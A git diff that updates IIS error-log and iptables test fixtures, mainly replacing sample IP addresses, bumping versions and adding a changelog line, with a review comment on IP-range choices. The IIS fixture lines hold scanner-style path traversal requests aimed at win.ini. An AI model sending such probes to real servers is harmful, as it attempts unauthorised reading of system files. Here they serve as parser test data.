-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /..\pixfir~1\how_to_login.html 403 - Forbidden -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ..\..\..\..\..\..\winnt\win.ini 400 - URL -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\..\..\..\..\..\..\winnt\win.ini 403 - Forbidden -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -
+2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL -
diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json index 70deaa9f2af..8d04eec0d0a 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json @@ -7,18 +7,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "12.2.1", @@ -39,7 +30,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -53,8 +44,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638704300Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", + "ingested": "2021-12-09T13:39:38.462543700Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", "category": [ "web", "network" @@ -73,18 +64,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "./././././../../../../../../../../", @@ -105,7 +87,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, 
@@ -119,8 +101,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638723600Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", + "ingested": "2021-12-09T13:39:38.462553Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", "category": [ "web", "network" @@ -139,18 +121,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "original": "/..\\pixfir~1\\how_to_login.html" @@ -169,7 +142,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -183,8 +156,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638728700Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", + "ingested": "2021-12-09T13:39:38.462558900Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", "category": [ "web", "network" @@ -203,18 +176,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" @@ -233,7 +197,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, 
@@ -247,8 +211,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638732800Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", + "ingested": "2021-12-09T13:39:38.462564400Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", "category": [ "web", "network" @@ -267,18 +231,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini", @@ -299,7 +254,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -313,8 +268,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638736600Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -", + "ingested": "2021-12-09T13:39:38.462569800Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -", "category": [ "web", "network" @@ -333,18 +288,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" @@ -363,7 +309,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, 
@@ -377,8 +323,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638740100Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", + "ingested": "2021-12-09T13:39:38.462575200Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", "category": [ "web", "network" @@ -397,18 +343,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "*", @@ -428,7 +365,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -442,8 +379,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638744Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", + "ingested": "2021-12-09T13:39:38.462580600Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", "category": [ "web", "network" @@ -462,18 +399,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "/fee\u0026fie=foe", @@ -493,7 +421,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, 
@@ -507,8 +435,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638747400Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /fee\u0026fie=foe 400 - URL -", + "ingested": "2021-12-09T13:39:38.462586Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /fee\u0026fie=foe 400 - URL -", "category": [ "web", "network" diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json index 92d66688b84..5b5975e1200 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json @@ -27,7 +27,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T11:14:32.755546700Z", + "ingested": "2021-12-09T13:39:39.018996800Z", "original": "2018-12-30 14:22:07 ::1%0 49958 ::1%0 80 - - - - - - Timer_ConnectionIdle -", "category": [ "web", diff --git a/packages/iis/manifest.yml b/packages/iis/manifest.yml index fe1f5f24b3b..4f39fce9252 100644 --- a/packages/iis/manifest.yml +++ b/packages/iis/manifest.yml @@ -1,6 +1,6 @@ name: iis title: IIS -version: 0.8.0 +version: 0.8.1 description: Collect logs and metrics from Internet Information Services (IIS) servers with Elastic Agent. type: integration icons: diff --git a/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log b/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log index 9cfc3a9c2f3..e69869eafa7 100644 --- a/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log +++ b/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log 
@@ -1,2 +1,2 @@
-<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
-<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
\ No newline at end of file
+<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
\ No newline at end of file
diff --git a/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log b/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log
index 569f8acb87f..5c0ab0ba384 100644
--- a/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log
+++ b/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log
@@ -1,20 +1,20 @@
-Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
-2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
-Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]
-Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0
-Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0
-Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0
-Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
-Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0
-Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1
+Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]
+Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0
+Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0
+Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0
+Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
+Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0
+Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1
 Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4
-Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520
-Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0
-Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0
-Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0
-Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0
\ No newline at end of file
+Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0
\ No newline at end of file
diff --git a/packages/iptables/changelog.yml b/packages/iptables/changelog.yml
index 4937d1bf5d7..e6532da1ae0 100644
--- a/packages/iptables/changelog.yml
+++ b/packages/iptables/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.6.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "0.6.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log
index bfd1f3e2989..68d3e68cda8 100644
--- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log
+++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log
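Review bot: The `Jan 8` lines swap the RFC 5737 documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 for RFC 1918 addresses (192.168.2.x, 192.168.100.x) and for 81.2.69.143, and the `Jan 5` lines move 192.0.2.25 to 192.168.2.25; the documentation ranges exist precisely for sample data and never resolve in a GeoIP database, so they already gave stable pipeline output and did not need to change, while 81.2.69.143 is a routable allocation that is only a sound choice here if it is in the test database the pipeline tests run against. The `Jan 22 09:05:05` line likewise replaces the RFC 3849 prefix 2001:db8::/32 with 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 for both SRC and DST, so the IPv6 sample no longer has distinct endpoints. Consider keeping the documentation ranges where no enrichment is wanted, and recording why the remaining public addresses were picked, e.g. a line in the package docs such as `Sample logs use 67.43.156.x, 81.2.69.x and 2a02:cf40:: addresses because they are covered by the test GeoIP database; all other addresses are RFC 5737 or RFC 1918 space.` if that is indeed the reason. The same substitutions are made in test-iptables-raw.log.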
@@ -1,21 +1,21 @@
-<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
